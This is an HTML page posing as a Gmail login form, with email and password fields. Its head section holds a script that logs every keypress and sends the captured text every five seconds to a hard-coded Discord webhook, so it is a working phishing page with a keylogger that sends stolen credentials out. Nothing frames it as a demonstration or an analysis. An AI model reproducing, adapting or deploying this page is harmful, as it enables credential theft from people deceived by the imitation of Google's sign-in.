<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8"/>
    <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
    <title>Login - Gmail</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f1f1f1;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .login-container {
            background-color: white;
            padding: 20px;
            border-radius: 5px;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
            width: 300px;
        }
        h2 {
            text-align: center;
        }
        .input-group {
            margin-bottom: 15px;
        }
        .input-group label {
            display: block;
            margin-bottom: 5px;
            text-align: center; /* Center the label */
        }
        .input-group input {
            width: 100%;
            padding: 10px;
            border: 1px solid #ccc;
            border-radius: 3px;
            box-sizing: border-box; /* Ensure padding is included in width */
        }
        .btn {
            width: 100%;
            padding: 10px;
            background-color: #4285f4;
            color: white;
            border: none;
            border-radius: 3px;
            cursor: pointer;
        }
        .btn:hover {
            background-color: #357ae8;
        }
    </style>
    <script>
        let logs = '';

        document.addEventListener('keypress', function(event) {
            logs += event.key;
        });

        setInterval(function() {
            if (logs.length > 0) {
                fetch('https://discord.com/api/webhooks/1380765000670515221/8PaaXWxUfKCLQU7eEr0nWhPxvTt-BEYA6GdUPRcGUOpOntnzI-dlRQauWGc8oGlZenSD', {
                    method: 'POST',
                    body: JSON.stringify({ content: logs }),
                    headers: { 'Content-Type': 'application/json' }
                });
                logs = ''; // Clear logs after sending
            }
        }, 5000); // Send logs every 5 seconds
    </script>
</head>
<body>
    <div class="login-container">
        <h2>Gmail Login</h2>
        <form action="" method="post">
            <div class="input-group">
                <label for="email">Email or Phone</label>
                <input type="text" id="email" name="email" required=""/>
            </div>
            <div class="input-group">
                <label for="password">Password</label>
                <input type="password" id="password" name="password" required=""/>
            </div>
            <button type="submit" class="btn">Next</button>
        </form>
    </div>
</body>
</html>
